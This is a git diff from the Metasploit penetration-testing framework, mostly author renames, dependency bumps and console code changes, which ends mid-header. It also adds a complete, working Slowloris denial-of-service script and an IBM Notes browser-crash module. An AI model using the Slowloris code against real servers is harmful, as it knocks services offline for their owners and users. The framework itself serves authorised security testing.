one of: + # nil - This argument is a flag and takes no option. + # true - This argument takes an option with no suggestions. + # :address - This option is a source address. + # :bool - This option is a boolean. + # :file - This option is a file path. + # Array - This option is an array of possible values. + # + def tab_complete_generic(fmt, str, words) + last_word = words[-1] + fmt = fmt.select { |key, value| last_word == key || !words.include?(key) } + + val = fmt[last_word] + return fmt.keys if !val # the last word does not look like a fmtspec + arg = val[0] + return fmt.keys if !arg # the last word is a fmtspec that takes no argument + + tabs = [] + if arg.to_s.to_sym == :address + tabs = tab_complete_source_address + elsif arg.to_s.to_sym == :bool + tabs = ['true', 'false'] + elsif arg.to_s.to_sym == :file + tabs = tab_complete_filenames(str, words) + elsif arg.kind_of?(Array) + tabs = arg.map {|a| a.to_s} + end + tabs + end + + # + # Return a list of possible source addresses for tab completion. + # + def tab_complete_source_address + addresses = [Rex::Socket.source_address] + # getifaddrs was introduced in 2.1.2 + if Socket.respond_to?(:getifaddrs) + ifaddrs = Socket.getifaddrs.find_all do |ifaddr| + ((ifaddr.flags & Socket::IFF_LOOPBACK) == 0) && + ifaddr.addr && + ifaddr.addr.ip? + end + addresses += ifaddrs.map { |ifaddr| ifaddr.addr.ip_address } + end + addresses + end end # @@ -368,6 +419,73 @@ module DispatcherShell return items end + # Processes a resource script file for the console. + # + # @param path [String] Path to a resource file to run + # @return [void] + def load_resource(path) + if path == '-' + resource_file = $stdin.read + path = 'stdin' + elsif ::File.exist?(path) + resource_file = ::File.read(path) + else + print_error("Cannot find resource script: #{path}") + return + end + + # Process ERB directives first + print_status "Processing #{path} for ERB directives." + erb = ERB.new(resource_file) + processed_resource = erb.result(binding) + + lines = processed_resource.each_line.to_a + bindings = {} + while lines.length > 0 + + line = lines.shift + break if not line + line.strip! + next if line.length == 0 + next if line =~ /^#/ + + # Pretty soon, this is going to need an XML parser :) + # TODO: case matters for the tag and for binding names + if line =~ /|\s+)/ + bin = ($~[1] || $~[2]) + bindings[bin] = binding unless bindings.has_key? bin + bin = bindings[bin] + else + bin = binding + end + buff = '' + while lines.length > 0 + line = lines.shift + break if not line + break if line =~ /<\/ruby>/ + buff << line + end + if ! buff.empty? + session = client + framework = client.framework + + print_status("resource (#{path})> Ruby Code (#{buff.length} bytes)") + begin + eval(buff, bin) + rescue ::Interrupt + raise $! + rescue ::Exception => e + print_error("resource (#{path})> Ruby Error: #{e.class} #{e} #{e.backtrace}") + end + end + else + print_line("resource (#{path})> #{line}") + run_single(line) + end + end + end + # # Run a single command line. # @@ -464,7 +582,7 @@ module DispatcherShell inst = dispatcher.new(self) self.dispatcher_stack.each { |disp| if (disp.name == inst.name) - raise RuntimeError.new("Attempting to load already loaded dispatcher #{disp.name}") + raise "Attempting to load already loaded dispatcher #{disp.name}" end } self.dispatcher_stack.push(inst) diff --git a/metasploit-framework.gemspec b/metasploit-framework.gemspec index 6accc821ad..177deef087 100644 --- a/metasploit-framework.gemspec +++ b/metasploit-framework.gemspec @@ -70,9 +70,9 @@ Gem::Specification.new do |spec| # are needed when there's no database spec.add_runtime_dependency 'metasploit-model' # Needed for Meterpreter - spec.add_runtime_dependency 'metasploit-payloads', '1.3.11' + spec.add_runtime_dependency 'metasploit-payloads', '1.3.18' # Needed for the next-generation POSIX Meterpreter - spec.add_runtime_dependency 'metasploit_payloads-mettle', '0.2.2' + spec.add_runtime_dependency 'metasploit_payloads-mettle', '0.2.8' # Needed by msfgui and other rpc components spec.add_runtime_dependency 'msgpack' # get list of network interfaces, like eth* from OS. @@ -139,7 +139,7 @@ Gem::Specification.new do |spec| # Library for Generating Randomized strings valid as Identifiers such as variable names spec.add_runtime_dependency 'rex-random_identifier' # library for creating Powershell scripts for exploitation purposes - spec.add_runtime_dependency 'rex-powershell', ["< 0.1.73"] + spec.add_runtime_dependency 'rex-powershell', ["< 0.1.78"] # Library for processing and creating Zip compatbile archives spec.add_runtime_dependency 'rex-zip' # Library for parsing offline Windows Registry files diff --git a/modules/auxiliary/admin/cisco/vpn_3000_ftp_bypass.rb b/modules/auxiliary/admin/cisco/vpn_3000_ftp_bypass.rb index 267a21fa22..d7d8a45b5d 100644 --- a/modules/auxiliary/admin/cisco/vpn_3000_ftp_bypass.rb +++ b/modules/auxiliary/admin/cisco/vpn_3000_ftp_bypass.rb @@ -17,7 +17,7 @@ class MetasploitModule < Msf::Auxiliary verifies that the directory has been created, then deletes it and verifies deletion to confirm the bug. }, - 'Author' => [ 'patrick' ], + 'Author' => [ 'aushack' ], 'License' => MSF_LICENSE, 'References' => [ diff --git a/modules/auxiliary/admin/http/contentkeeper_fileaccess.rb b/modules/auxiliary/admin/http/contentkeeper_fileaccess.rb index b52505b78b..24ad229369 100644 --- a/modules/auxiliary/admin/http/contentkeeper_fileaccess.rb +++ b/modules/auxiliary/admin/http/contentkeeper_fileaccess.rb @@ -20,7 +20,7 @@ class MetasploitModule < Msf::Auxiliary [ 'OSVDB', '54551' ], [ 'URL', 'http://www.aushack.com/200904-contentkeeper.txt' ], ], - 'Author' => [ 'patrick' ], + 'Author' => [ 'aushack' ], 'License' => MSF_LICENSE) register_options( diff --git a/modules/auxiliary/admin/http/hp_web_jetadmin_exec.rb b/modules/auxiliary/admin/http/hp_web_jetadmin_exec.rb index 2b4f81af1c..3c6d4bc109 100644 --- a/modules/auxiliary/admin/http/hp_web_jetadmin_exec.rb +++ b/modules/auxiliary/admin/http/hp_web_jetadmin_exec.rb @@ -17,7 +17,7 @@ class MetasploitModule < Msf::Auxiliary systems, however at this stage the module only works against Windows. This module does not apply to HP printers. }, - 'Author' => [ 'patrick' ], + 'Author' => [ 'aushack' ], 'License' => MSF_LICENSE, 'References' => [ diff --git a/modules/auxiliary/admin/http/iomega_storcenterpro_sessionid.rb b/modules/auxiliary/admin/http/iomega_storcenterpro_sessionid.rb index 76f03693a3..e33e2f3163 100644 --- a/modules/auxiliary/admin/http/iomega_storcenterpro_sessionid.rb +++ b/modules/auxiliary/admin/http/iomega_storcenterpro_sessionid.rb @@ -19,7 +19,7 @@ class MetasploitModule < Msf::Auxiliary [ 'OSVDB', '55586' ], [ 'CVE', '2009-2367' ], ], - 'Author' => [ 'patrick' ], + 'Author' => [ 'aushack' ], 'License' => MSF_LICENSE ) diff --git a/modules/auxiliary/admin/http/tomcat_utf8_traversal.rb b/modules/auxiliary/admin/http/tomcat_utf8_traversal.rb index 98f66d9436..2680d65785 100644 --- a/modules/auxiliary/admin/http/tomcat_utf8_traversal.rb +++ b/modules/auxiliary/admin/http/tomcat_utf8_traversal.rb @@ -29,7 +29,7 @@ class MetasploitModule < Msf::Auxiliary [ 'CVE', '2008-2938' ], [ 'URL', 'http://www.securityfocus.com/archive/1/499926' ], ], - 'Author' => [ 'patrick','guerrino di massa' ], + 'Author' => [ 'aushack','guerrino di massa' ], 'License' => MSF_LICENSE, 'DisclosureDate' => 'Jan 9 2009' ) diff --git a/modules/auxiliary/admin/http/trendmicro_dlp_traversal.rb b/modules/auxiliary/admin/http/trendmicro_dlp_traversal.rb index 3fc6403248..0e5679db0c 100644 --- a/modules/auxiliary/admin/http/trendmicro_dlp_traversal.rb +++ b/modules/auxiliary/admin/http/trendmicro_dlp_traversal.rb @@ -29,7 +29,7 @@ class MetasploitModule < Msf::Auxiliary [ 'EDB', '17388' ], [ 'BID', '48225' ], ], - 'Author' => [ 'patrick' ], + 'Author' => [ 'aushack' ], 'License' => MSF_LICENSE, 'DisclosureDate' => 'Jan 9 2009' ) diff --git a/modules/auxiliary/admin/officescan/tmlisten_traversal.rb b/modules/auxiliary/admin/officescan/tmlisten_traversal.rb index 4675bb60b2..ca7b23d680 100644 --- a/modules/auxiliary/admin/officescan/tmlisten_traversal.rb +++ b/modules/auxiliary/admin/officescan/tmlisten_traversal.rb @@ -23,7 +23,7 @@ class MetasploitModule < Msf::Auxiliary [ 'BID', '31531' ], [ 'URL', 'http://www.trendmicro.com/ftp/documentation/readme/OSCE_7.3_Win_EN_CriticalPatch_B1372_Readme.txt' ], ], - 'Author' => [ 'Anshul Pandey ', 'patrick' ], + 'Author' => [ 'Anshul Pandey ', 'aushack' ], 'License' => MSF_LICENSE ) diff --git a/modules/auxiliary/admin/pop2/uw_fileretrieval.rb b/modules/auxiliary/admin/pop2/uw_fileretrieval.rb index a4ed39faa3..114408d08c 100644 --- a/modules/auxiliary/admin/pop2/uw_fileretrieval.rb +++ b/modules/auxiliary/admin/pop2/uw_fileretrieval.rb @@ -17,7 +17,7 @@ class MetasploitModule < Msf::Auxiliary be exploited with a valid username and password. The From address is the file owner. }, - 'Author' => [ 'patrick' ], + 'Author' => [ 'aushack' ], 'License' => MSF_LICENSE, 'References' => [ diff --git a/modules/auxiliary/admin/smb/check_dir_file.rb b/modules/auxiliary/admin/smb/check_dir_file.rb index 59c0c1705c..dc166d67d0 100644 --- a/modules/auxiliary/admin/smb/check_dir_file.rb +++ b/modules/auxiliary/admin/smb/check_dir_file.rb @@ -29,7 +29,7 @@ class MetasploitModule < Msf::Auxiliary }, 'Author' => [ - 'patrick', + 'aushack', 'j0hn__f' ], 'References' => diff --git a/modules/auxiliary/dos/cisco/ios_http_percentpercent.rb b/modules/auxiliary/dos/cisco/ios_http_percentpercent.rb index b6464a6afe..e9fd575d6c 100644 --- a/modules/auxiliary/dos/cisco/ios_http_percentpercent.rb +++ b/modules/auxiliary/dos/cisco/ios_http_percentpercent.rb @@ -16,7 +16,7 @@ class MetasploitModule < Msf::Auxiliary unresponsive. IOS 11.1 -> 12.1 are reportedly vulnerable. This module tested successfully against a Cisco 1600 Router IOS v11.2(18)P. }, - 'Author' => [ 'patrick' ], + 'Author' => [ 'aushack' ], 'License' => MSF_LICENSE, 'References' => [ diff --git a/modules/auxiliary/dos/http/3com_superstack_switch.rb b/modules/auxiliary/dos/http/3com_superstack_switch.rb index c40f133e30..d67c7aba1d 100644 --- a/modules/auxiliary/dos/http/3com_superstack_switch.rb +++ b/modules/auxiliary/dos/http/3com_superstack_switch.rb @@ -18,11 +18,11 @@ class MetasploitModule < Msf::Auxiliary against a 3300SM firmware v2.66. Reported to affect versions prior to v2.72. }, - 'Author' => [ 'patrick' ], + 'Author' => [ 'aushack' ], 'License' => MSF_LICENSE, 'References' => [ - # patrickw - I am not sure if these are correct, but the closest match! + # aushack - I am not sure if these are correct, but the closest match! [ 'OSVDB', '7246' ], [ 'CVE', '2004-2691' ], [ 'URL', 'http://support.3com.com/infodeli/tools/switches/dna1695-0aaa17.pdf' ], diff --git a/modules/auxiliary/dos/http/dell_openmanage_post.rb b/modules/auxiliary/dos/http/dell_openmanage_post.rb index 70b6bea12d..967ad612d6 100644 --- a/modules/auxiliary/dos/http/dell_openmanage_post.rb +++ b/modules/auxiliary/dos/http/dell_openmanage_post.rb @@ -18,7 +18,7 @@ class MetasploitModule < Msf::Auxiliary This module will crash the web server, however it is likely exploitable under certain conditions. }, - 'Author' => [ 'patrick' ], + 'Author' => [ 'aushack' ], 'License' => MSF_LICENSE, 'References' => [ diff --git a/modules/auxiliary/dos/http/ibm_lotus_notes2.rb b/modules/auxiliary/dos/http/ibm_lotus_notes2.rb new file mode 100644 index 0000000000..e1ed130c04 --- /dev/null +++ b/modules/auxiliary/dos/http/ibm_lotus_notes2.rb @@ -0,0 +1,70 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Auxiliary + include Msf::Exploit::Remote::HttpServer + + def initialize(info = {}) + super( + update_info( + info, + 'Name' => "IBM Notes Denial Of Service", + 'Description' => %q( + This module exploits a vulnerability in the native browser that comes with IBM Lotus Notes. + If successful, the browser will crash after viewing the webpage. + ), + 'License' => MSF_LICENSE, + 'Author' => [ + 'Dhiraj Mishra', + ], + 'References' => [ + ['EDB', '42604'], + [ 'CVE', '2017-1130' ] + ], + 'DisclosureDate' => 'Aug 31 2017', + 'Actions' => [[ 'WebServer' ]], + 'PassiveActions' => [ 'WebServer' ], + 'DefaultAction' => 'WebServer' + ) + ) + end + + def run + exploit # start http server + end + + def setup + @html = %| + + + + + | + end + + def on_request_uri(cli, _request) + print_status('Sending response') + send_response(cli, @html) + end +end diff --git a/modules/auxiliary/dos/http/slowloris.py b/modules/auxiliary/dos/http/slowloris.py new file mode 100755 index 0000000000..416b1bbf5e --- /dev/null +++ b/modules/auxiliary/dos/http/slowloris.py @@ -0,0 +1,139 @@ +#!/usr/bin/env python +# Note, works with both python 2.7 and 3 + +import random +import socket +import ssl +import string +import time + +from metasploit import module + +metadata = { + 'name': 'Slowloris Denial of Service Attack', + 'description': ''' + Slowloris tries to keep many connections to the target web server open and hold them open as long as possible. + It accomplishes this by opening connections to the target web server and sending a partial request. + Periodically, it will send subsequent HTTP headers, adding to-but never completing-the request. + Affected servers will keep these connections open, filling their maximum concurrent connection pool, + eventually denying additional connection attempts from clients. + ''', + 'authors': [ + 'RSnake', # Vulnerability disclosure + 'Gokberk Yaltirakli', # Simple slowloris in Python + 'Daniel Teixeira', # Metasploit module (Ruby) + 'Matthew Kienow ' # Metasploit external module (Python) + ], + 'date': '2009-06-17', + 'references': [ + {'type': 'cve', 'ref': '2007-6750'}, + {'type': 'cve', 'ref': '2010-2227'}, + {'type': 'url', 'ref': 'https://www.exploit-db.com/exploits/8976/'}, + {'type': 'url', 'ref': 'https://github.com/gkbrk/slowloris'} + ], + 'type': 'dos', + 'options': { + 'rhost': {'type': 'address', 'description': 'The target address', 'required': True, 'default': None}, + 'rport': {'type': 'port', 'description': 'The target port', 'required': True, 'default': 80}, + 'sockets': {'type': 'int', 'description': 'The number of sockets to use in the attack', 'required': True, 'default': 150}, + 'delay': {'type': 'int', 'description': 'The delay between sending keep-alive headers', 'required': True, 'default': 15}, + 'ssl': {'type': 'bool', 'description': 'Negotiate SSL/TLS for outgoing connections', 'required': True, 'default': False}, + 'rand_user_agent': {'type': 'bool', 'description': 'Randomizes user-agent with each request', 'required': True, 'default': True} + }} + +list_of_sockets = [] +user_agents = [ + "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36", + "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36", + "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Safari/602.1.50", + "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:49.0) Gecko/20100101 Firefox/49.0", + "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36", + "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36", + "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36", + "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/602.2.14 (KHTML, like Gecko) Version/10.0.1 Safari/602.2.14", + "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Safari/602.1.50", + "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393" + "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36", + "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36", + "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36", + "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36", + "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0", + "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36", + "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36", + "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36", + "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36", + "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0", + "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko", + "Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0", + "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36", + "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36", + "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:49.0) Gecko/20100101 Firefox/49.0", +] + + +def create_random_header_name(size=8, seq=string.ascii_uppercase + string.ascii_lowercase): + return ''.join(random.choice(seq) for _ in range(size)) + + +def init_socket(host, port, use_ssl=False, rand_user_agent=True): + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.settimeout(4) + + if use_ssl: + s = ssl.wrap_socket(s) + + s.connect((host, port)) + + s.send("GET /?{} HTTP/1.1\r\n".format(random.randint(0, 2000)).encode("utf-8")) + + if rand_user_agent: + s.send("User-Agent: {}\r\n".format(random.choice(user_agents)).encode("utf-8")) + else: + s.send("User-Agent: {}\r\n".format(user_agents[0]).encode("utf-8")) + + s.send("{}\r\n".format("Accept-language: en-US,en,q=0.5").encode("utf-8")) + return s + + +def run(args): + host = args['rhost'] + port = int(args['rport']) + use_ssl = args['ssl'] == "true" + rand_user_agent = args['rand_user_agent'] == "true" + socket_count = int(args['sockets']) + delay = int(args['delay']) + + module.log("Attacking %s with %s sockets" % (host, socket_count), 'info') + + module.log("Creating sockets...", 'info') + for i in range(socket_count): + try: + module.log("Creating socket number %s" % i, 'debug') + s = init_socket(host, port, use_ssl=use_ssl, rand_user_agent=rand_user_agent) + except socket.error: + break + list_of_sockets.append(s) + + while True: + module.log("Sending keep-alive headers... Socket count: %s" % len(list_of_sockets), 'info') + for s in list(list_of_sockets): + try: + s.send("{}: {}\r\n".format(create_random_header_name(random.randint(8, 16)), + random.randint(1, 5000)).encode("utf-8")) + + except socket.error: + list_of_sockets.remove(s) + + for _ in range(socket_count - len(list_of_sockets)): + module.log("Recreating socket...", 'debug') + try: + s = init_socket(host, port, use_ssl=use_ssl, rand_user_agent=rand_user_agent) + if s: + list_of_sockets.append(s) + except socket.error: + break + time.sleep(delay) + + +if __name__ == "__main__": + module.run(metadata, run) diff --git a/modules/auxiliary/dos/http/sonicwall_ssl_format.rb b/modules/auxiliary/dos/http/sonicwall_ssl_format.rb index 2e244dd9c5..8fc13a0c06 100644 --- a/modules/auxiliary/dos/http/sonicwall_ssl_format.rb +++ b/modules/auxiliary/dos/http/sonicwall_ssl_format.rb @@ -18,7 +18,7 @@ class MetasploitModule < Msf::Auxiliary string data. With physical access to the device and debugging, this module may be able to be used to execute arbitrary code remotely. }, - 'Author' => [ 'patrick' ], + 'Author' => [ 'aushack' ], 'License' => MSF_LICENSE, 'References' => [ [ 'BID', '35145' ], diff --git a/modules/auxiliary/dos/pptp/ms02_063_pptp_dos.rb b/modules/auxiliary/dos/pptp/ms02_063_pptp_dos.rb index 6aad396325..d9d68bcb0e 100644 --- a/modules/auxiliary/dos/pptp/ms02_063_pptp_dos.rb +++ b/modules/auxiliary/dos/pptp/ms02_063_pptp_dos.rb @@ -16,7 +16,7 @@ class MetasploitModule < Msf::Auxiliary (Remote Access Services). Kernel memory is overwritten resulting in a BSOD. Code execution may be possible however this module is only a DoS. }, - 'Author' => [ 'patrick' ], + 'Author' => [ 'aushack' ], 'License' => MSF_LICENSE, 'References' => [ diff --git a/modules/auxiliary/dos/smtp/sendmail_prescan.rb b/modules/auxiliary/dos/smtp/sendmail_prescan.rb index cc1583c8d3..7fc5008765 100644 --- a/modules/auxiliary/dos/smtp/sendmail_prescan.rb +++ b/modules/auxiliary/dos/smtp/sendmail_prescan.rb @@ -16,7 +16,7 @@ class MetasploitModule < Msf::Auxiliary parsing SMTP headers. Due to the prescan function, only 0x5c and 0x00 bytes can be used, limiting the likelihood for arbitrary code execution. }, - 'Author' => [ 'patrick' ], + 'Author' => [ 'aushack' ], 'References' => [ [ 'OSVDB', '2577' ], diff --git a/modules/auxiliary/dos/windows/ftp/filezilla_admin_user.rb b/modules/auxiliary/dos/windows/ftp/filezilla_admin_user.rb index 4c258ee293..85d5dc9e55 100644 --- a/modules/auxiliary/dos/windows/ftp/filezilla_admin_user.rb +++ b/modules/auxiliary/dos/windows/ftp/filezilla_admin_user.rb @@ -18,7 +18,7 @@ class MetasploitModule < Msf::Auxiliary when running, will overwrite the stack with our string and generate an exception. The FileZilla FTP Server itself will continue functioning. }, - 'Author' => [ 'patrick' ], + 'Author' => [ 'aushack' ], 'License' => MSF_LICENSE, 'References' => [ diff --git a/modules/auxiliary/dos/windows/ftp/filezilla_server_port.rb b/modules/auxiliary/dos/windows/ftp/filezilla_server_port.rb index 663fec8cbf..f39899757f 100644 --- a/modules/auxiliary/dos/windows/ftp/filezilla_server_port.rb +++ b/modules/auxiliary/dos/windows/ftp/filezilla_server_port.rb @@ -15,7 +15,7 @@ class MetasploitModule < Msf::Auxiliary Server versions 0.9.21 and earlier. By sending a malformed PORT command then LIST command, the server attempts to write to a NULL pointer. }, - 'Author' => [ 'patrick' ], + 'Author' => [ 'aushack' ], 'License' => MSF_LICENSE, 'References' => [ diff --git a/modules/auxiliary/gather/checkpoint_hostname.rb b/modules/auxiliary/gather/checkpoint_hostname.rb index 8b8fe85c16..0cf696d5e2 100644 --- a/modules/auxiliary/gather/checkpoint_hostname.rb +++ b/modules/auxiliary/gather/checkpoint_hostname.rb @@ -21,11 +21,11 @@ class MetasploitModule < Msf::Auxiliary networks where the hostname reveals the physical location and rack number of the device, which may be unintentionally published to the world. }, - 'Author' => [ 'patrick' ], + 'Author' => [ 'aushack' ], 'DisclosureDate' => 'Dec 14 2011', # Looks like this module is first real reference 'References' => [ - # patrickw - None? Stumbled across, probably an old bug/feature but unsure. + # aushack - None? Stumbled across, probably an old bug/feature but unsure. [ 'URL', 'http://www.osisecurity.com.au/advisories/checkpoint-firewall-securemote-hostname-information-disclosure' ], [ 'URL', 'https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk69360' ] ] diff --git a/modules/auxiliary/gather/citrix_published_applications.rb b/modules/auxiliary/gather/citrix_published_applications.rb index cce142b7bb..6146c7eb4a 100644 --- a/modules/auxiliary/gather/citrix_published_applications.rb +++ b/modules/auxiliary/gather/citrix_published_applications.rb @@ -13,7 +13,7 @@ class MetasploitModule < Msf::Auxiliary This module attempts to query Citrix Metaframe ICA server to obtain a published list of applications. }, - 'Author' => [ 'patrick' ], + 'Author' => [ 'aushack' ], 'References' => [ [ 'URL', 'http://www.securiteam.com/exploits/5CP0B1F80S.html' ], diff --git a/modules/auxiliary/gather/citrix_published_bruteforce.rb b/modules/auxiliary/gather/citrix_published_bruteforce.rb index c2afcd4012..d40f550b22 100644 --- a/modules/auxiliary/gather/citrix_published_bruteforce.rb +++ b/modules/auxiliary/gather/citrix_published_bruteforce.rb @@ -13,7 +13,7 @@ class MetasploitModule < Msf::Auxiliary This module attempts to brute force program names within the Citrix Metaframe ICA server. }, - 'Author' => [ 'patrick' ], + 'Author' => [ 'aushack' ], 'References' => [ [ 'OSVDB', '50617' ], diff --git a/modules/auxiliary/scanner/discovery/arp_sweep.rb b/modules/auxiliary/scanner/discovery/arp_sweep.rb index 45993f560b..fa495b4333 100644 --- a/modules/auxiliary/scanner/discovery/arp_sweep.rb +++ b/modules/auxiliary/scanner/discovery/arp_sweep.rb @@ -46,11 +46,11 @@ class MetasploitModule < Msf::Auxiliary @interface = datastore['INTERFACE'] || Pcap.lookupdev shost = datastore['SHOST'] shost ||= get_ipv4_addr(@interface) if @netifaces - raise RuntimeError ,'SHOST should be defined' unless shost + raise 'SHOST should be defined' unless shost smac = datastore['SMAC'] smac ||= get_mac(@interface) if @netifaces - raise RuntimeError ,'SMAC should be defined' unless smac + raise 'SMAC should be defined' unless smac begin diff --git a/modules/auxiliary/scanner/discovery/ipv6_neighbor.rb b/modules/auxiliary/scanner/discovery/ipv6_neighbor.rb index 00530de45c..78f2491524 100644 --- a/modules/auxiliary/scanner/discovery/ipv6_neighbor.rb +++ b/modules/auxiliary/scanner/discovery/ipv6_neighbor.rb @@ -49,11 +49,11 @@ class MetasploitModule < Msf::Auxiliary @interface = datastore['INTERFACE'] || Pcap.lookupdev @shost = datastore['SHOST'] @shost ||= get_ipv4_addr(@interface) if @netifaces - raise RuntimeError ,'SHOST should be defined' unless @shost + raise 'SHOST should be defined' unless @shost @smac = datastore['SMAC'] @smac ||= get_mac(@interface) if @netifaces - raise RuntimeError ,'SMAC should be defined' unless @smac + raise 'SMAC should be defined' unless @smac addrs = [] diff --git a/modules/auxiliary/scanner/discovery/ipv6_neighbor_router_advertisement.rb b/modules/auxiliary/scanner/discovery/ipv6_neighbor_router_advertisement.rb index cbf01588c4..747a276e7e 100644 --- a/modules/auxiliary/scanner/discovery/ipv6_neighbor_router_advertisement.rb +++ b/modules/auxiliary/scanner/discovery/ipv6_neighbor_router_advertisement.rb @@ -161,12 +161,12 @@ class MetasploitModule < Msf::Auxiliary @interface = datastore['INTERFACE'] || Pcap.lookupdev @shost = datastore['SHOST'] @shost ||= get_ipv4_addr(@interface) if @netifaces - raise RuntimeError ,'SHOST should be defined' unless @shost + raise 'SHOST should be defined' unless @shost @smac = datastore['SMAC'] @smac ||= get_mac(@interface) if @netifaces @smac ||= ipv6_mac - raise RuntimeError ,'SMAC should be defined' unless @smac + raise 'SMAC should be defined' unless @smac # Send router advertisement print_status("Sending router advertisement...") diff --git a/modules/auxiliary/scanner/http/chromecast_webserver.rb b/modules/auxiliary/scanner/http/chromecast_webserver.rb index c62019c8c5..82b9f1233e 100644 --- a/modules/auxiliary/scanner/http/chromecast_webserver.rb +++ b/modules/auxiliary/scanner/http/chromecast_webserver.rb @@ -37,12 +37,7 @@ class MetasploitModule < Msf::Auxiliary return unless (res && res.code == 200) - begin - json = JSON.parse(res.body) - rescue JSON::ParserError - return - end - + json = res.get_json_document name, ssid = json['name'], json['ssid'] if name && ssid diff --git a/modules/auxiliary/scanner/http/chromecast_wifi.rb b/modules/auxiliary/scanner/http/chromecast_wifi.rb index 63bd531a60..c68cfea3b1 100644 --- a/modules/auxiliary/scanner/http/chromecast_wifi.rb +++ b/modules/auxiliary/scanner/http/chromecast_wifi.rb @@ -43,7 +43,7 @@ class MetasploitModule < Msf::Auxiliary 'SortIndex' => -1 ) - JSON.parse(res.body).each do |wap| + res.get_json_document.each do |wap| waps_table << [ wap['bssid'], wap['signal_level'], diff --git a/modules/auxiliary/scanner/http/cisco_ios_auth_bypass.rb b/modules/auxiliary/scanner/http/cisco_ios_auth_bypass.rb index 59e07b41b2..14437759c5 100644 --- a/modules/auxiliary/scanner/http/cisco_ios_auth_bypass.rb +++ b/modules/auxiliary/scanner/http/cisco_ios_auth_bypass.rb @@ -26,7 +26,7 @@ class MetasploitModule < Msf::Auxiliary control. IOS 11.3 -> 12.2 are reportedly vulnerable. This module tested successfully against a Cisco 1600 Router IOS v11.3(11d). }, - 'Author' => [ 'patrick', 'hdm' ], + 'Author' => [ 'aushack', 'hdm' ], 'License' => MSF_LICENSE, 'References' => [ diff --git a/modules/auxiliary/scanner/http/dir_webdav_unicode_bypass.rb b/modules/auxiliary/scanner/http/dir_webdav_unicode_bypass.rb index d84ea5fbd7..ca445829d1 100644 --- a/modules/auxiliary/scanner/http/dir_webdav_unicode_bypass.rb +++ b/modules/auxiliary/scanner/http/dir_webdav_unicode_bypass.rb @@ -22,7 +22,7 @@ class MetasploitModule < Msf::Auxiliary where WebDAV is enabled on the IIS6 server, and any protected folder requires either Basic, Digest or NTLM authentication. }, - 'Author' => [ 'patrick' ], + 'Author' => [ 'aushack' ], 'License' => MSF_LICENSE, 'References' => [ @@ -154,7 +154,7 @@ class MetasploitModule < Msf::Auxiliary 'ctype' => 'application/xml', 'headers' => { - #'Translate' => 'f', # Not required in PROPFIND, only GET - patrickw 20091518 + #'Translate' => 'f', # Not required in PROPFIND, only GET - aushack 20091518 }, 'data' => webdav_req + "\r\n\r\n", }, 20) diff --git a/modules/auxiliary/scanner/http/jenkins_enum.rb b/modules/auxiliary/scanner/http/jenkins_enum.rb index 953c0ca9c6..2eaa0a1ac9 100644 --- a/modules/auxiliary/scanner/http/jenkins_enum.rb +++ b/modules/auxiliary/scanner/http/jenkins_enum.rb @@ -51,7 +51,7 @@ class MetasploitModule < Msf::Auxiliary end version = res.headers['X-Jenkins'] - print_good("Jenkins Version - #{version}") + print_good("#{peer} - Jenkins Version #{version}") report_service( :host => rhost, :port => rport, diff --git a/modules/auxiliary/scanner/http/ms09_020_webdav_unicode_bypass.rb 